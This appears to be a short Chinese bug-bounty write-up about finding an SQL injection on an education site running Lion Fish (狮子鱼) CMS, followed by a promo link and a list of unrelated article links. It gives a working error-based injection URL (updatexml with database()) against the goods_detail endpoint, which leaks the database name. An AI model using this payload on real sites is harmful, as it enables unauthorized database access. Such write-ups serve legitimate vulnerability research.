EDU实战-SQL注入漏洞

对于edu来说,是新人挖洞较好的平台,本次记录一次走运的捡漏

0x01 前景

在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点

确认目标身份(使用的quake进行然后去ipc备案查询)

网站后台很像cms搭建的,在查看网站时发现

/seller.php?s=/Public/login

狮子鱼cms的特征

直接去百度一手,发现有个SQL注入还有其他的,打算一个一个尝试看看

0x02 尝试挖掘

payload

https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)

成功爆破出数据库名

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

点赞+在看支持一下吧~

你的点赞是我更新的动力,免费领取安全学习资料包!

https://docs.qq.com/doc/DYlBlQ2xhaFBmamtq

相关推荐
G丶AEOM3 分钟前
SSL/TLS,SSL,TLS分别是什么
网络·网络协议·网络安全
儒道易行6 分钟前
【DVWA】RCE远程命令执行实战
网络·安全·网络安全
tatasix27 分钟前
MySQL UPDATE语句执行链路解析
数据库·mysql
Hacker_LaoYi28 分钟前
网络安全与加密
安全·web安全
南城花随雪。40 分钟前
硬盘(HDD)与固态硬盘(SSD)详细解读
数据库
儿时可乖了41 分钟前
使用 Java 操作 SQLite 数据库
java·数据库·sqlite
懒是一种态度43 分钟前
Golang 调用 mongodb 的函数
数据库·mongodb·golang
天海华兮1 小时前
mysql 去重 补全 取出重复 变量 函数 和存储过程
数据库·mysql
Koi慢热1 小时前
路由基础(全)
linux·网络·网络协议·安全
gma9992 小时前
Etcd 框架
数据库·etcd